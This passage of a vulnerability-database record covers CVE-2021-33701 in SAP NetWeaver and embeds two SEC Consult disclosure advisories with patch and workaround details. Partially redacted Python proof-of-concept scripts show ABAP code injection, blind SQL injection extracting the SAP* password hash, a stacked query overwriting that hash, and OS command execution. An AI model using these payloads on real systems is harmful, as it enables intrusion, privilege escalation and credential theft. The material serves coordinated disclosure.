highly impacts systems Confidentiality, Integrity and Availability.", "cvss3": {"exploitabilityScore": 2.3, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 9.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-09-15T19:15:00", "type": "cve", "title": "CVE-2021-33701", "cwe": ["CWE-89"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-33701"], "modified": "2022-04-01T18:59:00", "cpe": ["cpe:/a:sap:s4core:102", "cpe:/a:sap:dmis:2011_1_752", "cpe:/a:sap:s4core:104", "cpe:/a:sap:dmis:2020125", "cpe:/a:sap:s4core:105", "cpe:/a:sap:s4core:103", "cpe:/a:sap:dmis:2011_1_710", "cpe:/a:sap:dmis:2011_1_620", "cpe:/a:sap:dmis:2011_1_640", "cpe:/a:sap:dmis:2011_1_700", "cpe:/a:sap:dmis:2011_1_730", "cpe:/a:sap:dmis:2011_1_731", "cpe:/a:sap:sapscore:125", "cpe:/a:sap:dmis:710"], "id": "CVE-2021-33701", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-33701", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:sap:dmis:710:*:*:*:*:*:*:*", "cpe:2.3:a:sap:dmis:2011_1_731:*:*:*:*:*:*:*", "cpe:2.3:a:sap:dmis:2011_1_710:*:*:*:*:*:*:*", "cpe:2.3:a:sap:dmis:2011_1_640:*:*:*:*:*:*:*", "cpe:2.3:a:sap:dmis:2011_1_752:*:*:*:*:*:*:*", "cpe:2.3:a:sap:dmis:2011_1_620:*:*:*:*:*:*:*", "cpe:2.3:a:sap:dmis:2011_1_730:*:*:*:*:*:*:*", "cpe:2.3:a:sap:sapscore:125:*:*:*:*:*:*:*", "cpe:2.3:a:sap:dmis:2020125:*:*:*:*:*:*:*", "cpe:2.3:a:sap:s4core:103:*:*:*:*:*:*:*", "cpe:2.3:a:sap:s4core:105:*:*:*:*:*:*:*", "cpe:2.3:a:sap:s4core:104:*:*:*:*:*:*:*", "cpe:2.3:a:sap:s4core:102:*:*:*:*:*:*:*", "cpe:2.3:a:sap:dmis:2011_1_700:*:*:*:*:*:*:*"]}], "cnvd": [{"lastseen": "2022-08-22T09:52:18", "description": "SAP Business One is a suite of enterprise management software from SAP, a German company. SAP Business One has a code issue vulnerability that stems from insufficient validation when uploading files, which could be exploited to upload any file.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-16T00:00:00", "type": "cnvd", "title": "SAP Business One code issue vulnerability", "bulletinFamily": "cnvd", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-33698"], "modified": "2022-08-22T00:00:00", "id": "CNVD-2022-58476", "href": "https://www.cnvd.org.cn/flaw/show/CNVD-2022-58476", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "packetstorm": [{"lastseen": "2021-12-15T17:15:50", "description": "", "cvss3": {"exploitabilityScore": 2.3, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.1, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-12-15T00:00:00", "type": "packetstorm", "title": "SAP Netweaver IUUC_RECON_RC_COUNT_TABLE_BIG ABAP Code Injection", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-33701"], "modified": "2021-12-15T00:00:00", "id": "PACKETSTORM:165304", "href": "https://packetstormsecurity.com/files/165304/SAP-Netweaver-IUUC_RECON_RC_COUNT_TABLE_BIG-ABAP-Code-Injection.html", "sourceData": "`SEC Consult Vulnerability Lab Security Advisory < 20211214-1 > \n======================================================================= \ntitle: Remote ABAP Code Injection in SAP IUUC_RECON_RC_COUNT_TABLE_BIG \nproduct: SAP Netweaver \nvulnerable version: SAP DMIS 2011_1_731 SP 0013 \nfixed version: see solution section below \nCVE number: CVE-2021-33701 \nSAP Note: 3078312 \nimpact: Critical \nCVSS 3.1 Score: 9.1 \nCVSS 3.1 Vector: CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H \nhomepage: https://www.sap.com/ \nfound: 2021-07-16 \nby: Raschin Tavakoli (Office Vienna) \nSEC Consult Vulnerability Lab \n \nAn integrated part of SEC Consult, an Atos company \nEurope | Asia | North America \n \nhttps://www.sec-consult.com \n \n======================================================================= \n \nVendor description: \n------------------- \n\"SAP SE is a German multinational software corporation based in Walldorf, \nBaden-W\u00fcrttemberg, that develops enterprise software to manage business \noperations and customer relations. The company is especially known for its ERP \nsoftware. SAP is the largest non-American software company by revenue, the \nworld's third-largest publicly-traded software company by revenue, and the \nlargest German company by market capitalisation.\" \n \nSource: https://en.wikipedia.org/wiki/SAP \n \n \nBusiness recommendation: \n------------------------ \nSAP\u00ae released the patch (SNote 3078312) and SEC Consult advises all SAP\u00ae \ncustomers to update their systems immediately. \n \nAn in-depth security analysis performed by security professionals is \nhighly advised, as the software may be affected from further security issues. \n \n \nVulnerability overview/description: \n----------------------------------- \n1. Remote ABAP Code Injection in SAP IUUC_RECON_RC_COUNT_TABLE_BIG (CVE-2021-33701) \n \nThe IT_WHERE_CLAUSE parameter of the function module \nIUUC_RECON_RC_COUNT_TABLE_BIG is vulnerable to an ABAP Code Injection. \nUnfiltered user input is used to generate ABAP code dynamically via the \nGENERATE SUBROUTINE statement which then gets executed with a PERFORM \nstatement. As the attacker can freely choose the characters that can be used \nin these fields, he can execute arbitrary ABAP code. \n \nAs the affected function module is remote enabled, it allows attackers to \nperform remote attacks via RFC. \n \nNote that the vulnerable code part inside the function module has been changed \nin newer releases. The original code that was vulnerable to an ABAP Code \nInjection has been replaced with an ADBC driver call. Unfortunately, this \nchange also introduced an SQL injection vulnerability, which was addressed in \nSNote 3078312. \n \nThe issue has been reported in a separate SEC Consult advisory and can be viewed \nat the following URL: \n \nhttps://sec-consult.com/vulnerability-lab/advisory/remote-adbc-sql-injection-in-sap-netweaver \n \n \nAttack Prerequisites \n-------------------- \n1. Remote ABAP Code Injection in SAP IUUC_RECON_RC_COUNT_TABLE_BIG (CVE-2021-33701) \n \nFirst prerequisite is the authorization object S_DMIS (SAP SLO Data migration \nserver) with at least the following settings: \n \nMBT_PR_ARE: SAP Landscape Transformation \nMBT_PR_LEV: (not needed to be set) \nACTVT: 03 Display \n \nNote that it is common practice that authorization objects are (mis)configured \nwith wildcards, which increases the likelihood of the vulnerability. \n \nFurther, of course, authorization to perform function calls (S_RFC) has to be \ngranted. \n \nIn the majority of cases internal RFC communications are nowadays still found \nto be unencrypted. This increases the risk that attackers wiretap DMIS related \naccount passwords. Once such user is hijacked, the attacker has gained all \nnecessary prerequisites for further attacks as described in this advisory. \n \n \nProof of concept: \n----------------- \n1. Remote ABAP Code Injection in SAP IUUC_RECON_RC_COUNT_TABLE_BIG (CVE-2021-33701) \n \nAs a proof of concept, a script was created that assigns the attacker himself \nthe reference user DDIC inside the table REFUSER: \n \n* ************************************************************************** * \n#!/usr/bin/env python3 \nfrom pyrfc import Connection \n \nif __name__ == '__main__': \n \nmandt = {'000', '001'} # selected for demonstration purpose \nconn = Connection(ashost=\"XX.XX.XX.XX\", sysnr=\"00\", client=\"001\", \nuser=\"DEVELOPER\", passwd=\"Sap123456\", lang='EN') \n \nprint(\"USREFUS before:\") \nresult = conn.call('RFC_READ_TABLE', \nQUERY_TABLE='USREFUS', \nFIELDS=['MANDT', 'BNAME', 'REFUSER'], \nDELIMITER='|' \n) \ncolumn_values = [] \n \nfor line in result['DATA']: \nprint(line['WA']) \n \n[ --- PoC partially removed --- ] \n \nprint(\"\\nSending payload ...\\n\") \n \nresult = conn.call('RFC_READ_TABLE', \nQUERY_TABLE='USREFUS', \nFIELDS=['MANDT', 'BNAME', 'REFUSER'], \nDELIMITER='|' \n) \ncolumn_values = [] \n \nprint(\"USREFUS after:\") \nfor line in result['DATA']: \nprint(line['WA']) \n* ************************************************************************** * \n \nRunning the code produces the following output: \n \n$> iuuc_generic_abap.py \nUSREFUS before: \n001|DEVELOPER | \n001|BWDEVELOPER | \n001|TEST | \n001|E_TEST | \n001|DDIC | \n001|SAP* | \n \nSending payload ... \n \nUSREFUS after: \n001|BWDEVELOPER | \n001|TEST | \n001|E_TEST | \n001|DDIC | \n001|SAP* | \n001|DEVELOPER |DDIC \n \n \nVulnerable / tested versions: \n----------------------------- \nThis vulnerability has been tested on SAP Netweaver 752, 0001 (SP-Level), \nSAPK-11616INDMIS (Support Package) SAP DMIS 2011_1_731. \n \n \nVendor contact timeline: \n------------------------ \n2021-07-18: Contacting SAP Product Security Response Team through Web Portal \nhttps://www.sap.com/about/trust-center/security/incident-management.html \nID SR-21-00018 has been assigned \n2021-07-21: Vendor informs that the discussion has been taken up to the \napplication team \n2022-07-21: Vendor confirms vulnerability but marks it internally as a duplicate \nfor CVE-2021-33701 (see our other advisory for this function module) \n2021-11-17: SEC Consult sends final advisory to vendor and informs about release \ndate \n2021-12-14: Coordinated release of security advisory \n \n \nSolution: \n--------- \nSEC Consult advises all SAP\u00ae customers to implement SAP Security Note \n3078312 immediately. Note that Security Note 3078312 contains no automatic \ncorrection instructions for customers who run systems with DMIS versions or \nSupport Package levels lower than DMIS 2011 SP10 (2015). Please refer to the \nsection workaround. \n \n \nWorkaround: \n----------- \nIn lower SP levels, the correction can be applied manually by modifying \nfunction module IUUC_RECON_RC_COUNT_TABLE_BIG adding the following statement \ndirectly after the authorization check: \n \nASSERT it_where_clause[] IS INITIAL. \n \n \nAdvisory URL: \n------------- \nhttps://sec-consult.com/vulnerability-lab/ \n \n \n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \n \nSEC Consult Vulnerability Lab \n \nSEC Consult, an Atos company \nEurope | Asia | North America \n \nAbout SEC Consult Vulnerability Lab \nThe SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an \nAtos company. It ensures the continued knowledge gain of SEC Consult in the \nfield of network and application security to stay ahead of the attacker. The \nSEC Consult Vulnerability Lab supports high-quality penetration testing and \nthe evaluation of new offensive and defensive technologies for our customers. \nHence our customers obtain the most current information about vulnerabilities \nand valid recommendation about the risk profile of new technologies. \n \n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \nInterested to work with the experts of SEC Consult? \nSend us your application https://sec-consult.com/career/ \n \nInterested in improving your cyber security with the experts of SEC Consult? \nContact our local offices https://sec-consult.com/contact/ \n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \n \nMail: research at sec-consult dot com \nWeb: https://www.sec-consult.com \nBlog: http://blog.sec-consult.com \nTwitter: https://twitter.com/sec_consult \n \nEOF Raschin Tavakoli / @2021 \n \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/165304/SA-20211214-1.txt", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2021-12-15T17:14:56", "description": "", "cvss3": {"exploitabilityScore": 2.3, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.1, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-12-15T00:00:00", "type": "packetstorm", "title": "SAP Netweaver IUUC_RECON_RC_COUNT_TABLE_BIG SQL Injection", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-33701"], "modified": "2021-12-15T00:00:00", "id": "PACKETSTORM:165303", "href": "https://packetstormsecurity.com/files/165303/SAP-Netweaver-IUUC_RECON_RC_COUNT_TABLE_BIG-SQL-Injection.html", "sourceData": "`SEC Consult Vulnerability Lab Security Advisory < 20211214-0 > \n============================================================================== \ntitle: Remote ADBC SQL Injection in SAP IUUC_RECON_RC_COUNT_TABLE_BIG \nproduct: SAP Netweaver \nvulnerable version: see vulnerable/tested versions section below \nfixed version: see solution section below \nCVE number: CVE-2021-33701 \nSAP SNote: 3078312 \nimpact: Critical \nCVSS 3.1 Score: 9.1 \nCVSS 3.1 Vector: CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H \nhomepage: https://www.sap.com/ \nfound: 2021-07-07 \nby: Raschin Tavakoli (Office Vienna) \nSEC Consult Vulnerability Lab \n \nAn integrated part of SEC Consult, an Atos company \nEurope | Asia | North America \n \nhttps://www.sec-consult.com \n \n============================================================================== \n \nVendor description: \n------------------- \n\"SAP SE is a German multinational software corporation based in Walldorf, \nBaden-W\u00fcrttemberg, that develops enterprise software to manage business \noperations and customer relations. The company is especially known for its ERP \nsoftware. SAP is the largest non-American software company by revenue, the \nworld's third-largest publicly-traded software company by revenue, and the \nlargest German company by market capitalisation.\" \n \nSource: https://en.wikipedia.org/wiki/SAP \n \n \nBusiness recommendation: \n------------------------ \nSAP\u00ae released the patch (SNote 3078312) and SEC Consult advises all \nSAP\u00ae customers to update their systems immediately. \n \nAn in-depth security analysis performed by security professionals is \nhighly advised, as the software may be affected from further security issues. \n \n \nVulnerability overview/description: \n----------------------------------- \n1. Remote ADBC SQL Injection in SAP IUUC_RECON_RC_COUNT_TABLE_BIG (CVE-2021-33701) \n \nThe IT_WHERE_CLAUSE parameter of the function module \nIUUC_RECON_RC_COUNT_TABLE_BIG is vulnerable to an ADBC SQL Injection. The \nfunction is part of the package CNV_INC_PROCESSING_REMOTE inside the function \nmodule group IUUC_REMOTE. It is typically used to count table records in the \ncontext of logging table and trigger creations. \n \nADBC is an API for the Native SQL interface of the AS ABAP that is based on \nABAP Objects and can be used to pass Native SQL statements to the database \ninterface. ADBC SQL injections are a very serious type of vulnerability as \nthey allow attackers not only to access data directly at the database layer \nbut also to break out of the current client context. Moreover, stacked queries \ncan be used to perform arbitrary read/write commands. All of this leads to \nfull compromise of the SAP application server. \n \nAs the affected function module is remote enabled, it allows attackers to \nperform remote attacks via RFC. \n \nNote that the vulnerability was originally found by SEC Consult during a \nresearch on a system with DMIS in version DMIS 2011_1_731 SP 0013. In this \nversion, the same parameter IT_WHERE_CLAUSE was vulnerable to an ABAP \nCommand Injection. \n \nThe vulnerability seems to have been fixed insufficiently, leaving behind this \nADBC SQL Injection. The advisory can be viewed at the following URL: \n \nhttps://sec-consult.com/vulnerability-lab/advisory/remote-abap-code-injection-in-sap-netweaver/ \n \n \nAttack Prerequisites \n-------------------- \n1. Remote ADBC SQL Injection in SAP IUUC_RECON_RC_COUNT_TABLE_BIG (CVE-2021-33701) \n \nFirst prerequisite is the authorization object S_DMIS (SAP SLO Data migration \nserver) with at least the following settings: \n \nMBT_PR_ARE: SAP Landscape Transformation \nMBT_PR_LEV: (not needed to be set) \nACTVT: 03 Display \n \nNote that it is common practice that authorization objects are (mis)configured \nwith wildcards, which increases the likelihood of exploitation of the vulnerability. \n \nFurther, authorization to perform function calls (S_RFC) has to be \ngranted for remote exploitation or access to SE37 for local privilege escalation \n \nIn the majority of cases internal RFC communications are nowadays still found \nto be unencrypted. This increases the risk that attackers wiretap account \npasswords. Once such user is hijacked, the attacker has gained all necessary \nprerequisites for further attacks as described in this advisory. \n \n \nProof of concept: \n----------------- \n1. Remote ADBC SQL Injection in SAP IUUC_RECON_RC_COUNT_TABLE_BIG (CVE-2021-33701) \n \nExample A: Arbitrary Read \n \nAs a proof of concept, a script was created to brute force the password hash \nof the SAP* users in client 000 while authenticated to client 001. This \nalso demonstrates the possibility of breaking out of the current client context. \nFor this example, a boolean based Blind SQL attack was used. In \norder to get the exploitation to work, an arbitrary existing table has to be \nspecified for the parameter I_TABNAME (in this PoC ZDEMO_SOH was chosen). \n \nThe following excerpt shows the source code of the script: \n \n* ************************************************************************** * \n#!/usr/bin/env python3 \nfrom pyrfc import Connection \nfrom string import ascii_letters \n \ndef generate_alphabet(): \nalph = [] \nfor c in ascii_letters: \nalph.append(c) \nfor i in range(0,10): \nalph.append(str(i)) \nalph.append('+') \nalph.append('/') \nalph.append('=') \nreturn alph \n \nif __name__ == '__main__': \nfinal_str = \"\" \nconn = Connection(ashost=\"XX.XX.XX.XX\", sysnr=\"00\", client= \"001\", \nuser= \"Peter\", passwd=\"Sap123456\", lang='EN') \nalph = generate_alphabet() \n \nprint(\"Brute Forcing SAP* password hash in client 000 ...\") \n \nfor i in range(16, 61): \ntoggle = 0 \nfor c in alph: \nwhere_clause = (\"('\" + c + \n\"' IN (SELECT SUBSTRING(PWDSALTEDHASH,\" + str(i) + \n\",1) from USR02 WHERE BNAME='SAP*' AND MANDT='000'))\") \n \n[ --- PoC partially removed --- ] \n \nif(result['ET_COUNT'][0]['RECCNT'] != 0): \nfinal_str += c \nprint(\"{x-issha, 1024}\" + final_str,end='\\r') \nprint (\"\\n\") \n* ************************************************************************** * \n \nRunning the code produces the following output: \n \n$> poc_iuuc_remote.py \nBrute Forcing SAP* password hash in client 000... \n{x-issha, 1024}DRM3SNvfwWWsDf71QYyx+5L0AkN3l0nyKgPjvlBsPqE= \n \n \nExample B: Arbitrary Write \n \nThe next proof of concept demonstrates arbitrary write to the database by using \nstacked queries. The following payload inserts the password hash corresponding \nto the plaintext password \"Test123\" into the SAP* users of all clients and \nthen authenticates with the user SAP* on the other client 000. Afterwards, the \nOS command \"ip addr\" is executed: \n \n* ************************************************************************** * \n#!/usr/bin/env python3 \nfrom pyrfc import Connection \n \ndef read_ABAP_Report(): \nwith open('X:\\\\test.abap') as file: \ncontent = file.readlines() \ncontent = [x.strip() for x in content] \nreturn content \n \nif __name__ == '__main__': \nfinal_str = \"\" \nconn = Connection(ashost=\"XX.XX.XX.XX\", sysnr=\"00\", client= \"001\", \nuser= \"Peter\", passwd=\"Sap123456\", lang='EN') \n \nwhere_clause = ( \n\"1 = 1 ); UPDATE USR02 SET PWDSALTEDHASH = \" \n\"'{x-issha, 1024}voJRVT/rrJ31pxfmhb/zaBqhXA81CYKSnylMlKr/CkE=' \" \n\"WHERE BNAME = 'SAP*'; COMMIT WORK; --\") \n \n[ --- PoC partially removed --- ] \n \nconn2 = Connection(ashost=\"XX.XX.XX.XX\", sysnr=\"00\", client= \"000\", \nuser= \"SAP*\", passwd=\"Test123\", lang='EN') \n \ninject = ['REPORT Z_TEST213.' \n'DATA(c) = \\'ip addr\\'.', \n'DATA t TYPE TABLE OF char255.', \n'DATA l(250) TYPE c.', \n'CALL \\'SYSTEM\\' ID \\'COMMAND\\' FIELD c ID \\'TAB\\' FIELD t.', \n'LOOP AT t INTO l.', \n'WRITE: / l.', \n'ENDLOOP.'] \n \nparams = {'PROGRAM':inject} \nresult = conn2.call('/SAPDS/RFC_ABAP_INSTALL_RUN', **params) \nfor x in result['WRITES']: \nprint(x['ZEILE']) \n* ************************************************************************** * \n \nRunning the code produces the following output: \n \n$> .\\poc_iuuc_remote2.py \n1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group \ndefault ql \nlink/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00 \ninet 127.0.0.1/8 scope host lo \nvalid_lft forever preferred_lft forever \ninet6 ::1/128 scope host \nvalid_lft forever preferred_lft forever \n2: enp0s3: <NO-CARRIER,BROADCAST,MULTICAST,UP> mtu 1500 qdisc pfifo_fast state \nDOWN \nlink/ether XX:XX:XX:XX:XX:XX brd ff:ff:ff:ff:ff:ff \n3: enp0s8: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state U \nP grou \nlink/ether XX:XX:XX:XX:XX:XX brd ff:ff:ff:ff:ff:ff \ninet XX.XX.XX.XX/24 brd XX.XX.XX.255 scope global noprefixroute enp0s8 \nvalid_lft forever preferred_lft forever \ninet6 fe80::a00:27ff:fec3:fa40/64 scope link \nvalid_lft forever preferred_lft forever \n \n \nVulnerable / tested versions: \n----------------------------- \nThis vulnerability has been tested on SAP Netweaver 752 SP-LEVEL 0004 \nDMIS Release 2011_1_731 SP-Level 0016 SP SAPK-11616INDMIS. \n \nAccording to the vendor, the following products / versions are affected: \n* SAPSCORE 125 < SAPK-12502INSAPSCORE \n* S4CORE 105 < SAPK-10503INS4CORE \n* S4CORE 104 < SAPK-10405INS4CORE \n* S4CORE 103 < SAPK-10307INS4CORE \n* S4CORE 102 < SAPK-10209INS4CORE \n* S4CORE 101 < SAPK-10111INS4CORE \n* S4CORE 100 \n* DMIS 2018_1_752 < SAPK-20106INDMIS \n* DMIS 2020 < SAPK-20202INDMIS \n* DMIS 2011_1_700 < SAPK-11321INDMIS \n* DMIS 2011_1_710 < SAPK-11421INDMIS \n* DMIS 2011_1_730 < SAPK-11521INDMIS \n* DMIS 2011_1_731 < SAPK-11621INDMIS \n* DMIS 2011_1_620 < SAPK-11121INDMIS \n* DMIS 2011_1_640 < SAPK-11221INDMIS \n \n \nVendor contact timeline: \n------------------------ \n2021-07-08: Contacting SAP Product Security Response Team through Web Portal \nhttps://www.sap.com/about/trust-center/security/incident-management.html \nID SR-21-00009 has been assigned \n2021-07-19: Vendor confirms vulnerability \n2021-08-10: SNote 3078312 with patch released \n2021-11-17: SEC Consult sends final advisory to vendor and informs about release \ndate \n2021-11-18: SAP requests to obfuscate or remove PoC \n2021-12-14: Coordinated release of security advisory \n \n \nSolution: \n--------- \nSEC Consult advises all SAP\u00ae customers to implement SAP Security Note \n3078312 immediately. Note that Security Note 3078312 contains no automatic \ncorrection instructions for customers who run systems with DMIS versions or \nSupport Package levels lower than DMIS 2011 SP10 (2015). Please refer to the \nsection workaround. \n \n \nWorkaround: \n----------- \nIn lower SP levels, the correction can be applied manually by modifying \nfunction module IUUC_RECON_RC_COUNT_TABLE_BIG adding the following statement \ndirectly after the authorization check: \n \nASSERT it_where_clause[] IS INITIAL. \n \n \nAdvisory URL: \n------------- \nhttps://sec-consult.com/vulnerability-lab/ \n \n \n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \n \nSEC Consult Vulnerability Lab \n \nSEC Consult, an Atos company \nEurope | Asia | North America \n \nAbout SEC Consult Vulnerability Lab \nThe SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an \nAtos company. It ensures the continued knowledge gain of SEC Consult in the \nfield of network and application security to stay ahead of the attacker. The \nSEC Consult Vulnerability Lab supports high-quality penetration testing and \nthe evaluation of new offensive and defensive technologies for our customers. \nHence our customers obtain the most current information about vulnerabilities \nand valid recommendation about the risk profile of new technologies. \n \n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \nInterested to work with the experts of SEC Consult? \nSend us your application https://sec-consult.com/career/ \n \nInterested in improving your cyber security with the experts of SEC Consult? \nContact our local offices https://sec-consult.com/contact/ \n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \n \nMail: research at sec-consult dot com \nWeb: https://www.sec-consult.com \nBlog: http://blog.sec-consult.com \nTwitter: https://twitter.com/sec_consult \n \nEOF Raschin Tavakoli / @2021 \n \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/165303/SA-20211214-0.txt", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "zdt": [{"lastseen": "2021-12-20T06:01:53", "description": "SAP Netweaver suffers from a remote ADBC SQL injection vulnerability in IUUC_RECON_RC_COUNT_TABLE_BIG. Other software and various versions are also affected.", "cvss3": {"exploitabilityScore": 2.3, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.1, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-12-15T00:00:00", "type": "zdt", "title": "SAP Netweaver IUUC_RECON_RC_COUNT_TABLE_BIG SQL Injection Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-33701"], "modified": "2021-12-15T00:00:00", "id": "1337DAY-ID-37148", "href": "https://0day.today/exploit/description/37148", "sourceData": "==============================================================================\n title: Remote ADBC SQL Injection in SAP IUUC_RECON_RC_COUNT_TABLE_BIG\n product: SAP Netweaver\n vulnerable version: see vulnerable/tested versions section below\n fixed version: see solution section below\n CVE number: CVE-2021-33701\n SAP SNote: 3078312\n impact: Critical\n CVSS 3.1 Score: 9.1\n CVSS 3.1 Vector: CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H\n homepage: https://www.sap.com/\n found: 2021-07-07\n by: Raschin Tavakoli (Office Vienna)\n SEC Consult Vulnerability Lab\n\n An integrated part of SEC Consult, an Atos company\n Europe | Asia | North America\n\n https://www.sec-consult.com\n\n==============================================================================\n\nVendor description:\n-------------------\n\"SAP SE is a German multinational software corporation based in Walldorf,\nBaden-W\u00fcrttemberg, that develops enterprise software to manage business\noperations and customer relations. The company is especially known for its ERP\nsoftware. SAP is the largest non-American software company by revenue, the\nworld's third-largest publicly-traded software company by revenue, and the\nlargest German company by market capitalisation.\"\n\nSource: https://en.wikipedia.org/wiki/SAP\n\n\nBusiness recommendation:\n------------------------\nSAP\u00ae released the patch (SNote 3078312) and SEC Consult advises all\nSAP\u00ae customers to update their systems immediately.\n\nAn in-depth security analysis performed by security professionals is\nhighly advised, as the software may be affected from further security issues.\n\n\nVulnerability overview/description:\n-----------------------------------\n1. Remote ADBC SQL Injection in SAP IUUC_RECON_RC_COUNT_TABLE_BIG (CVE-2021-33701)\n\nThe IT_WHERE_CLAUSE parameter of the function 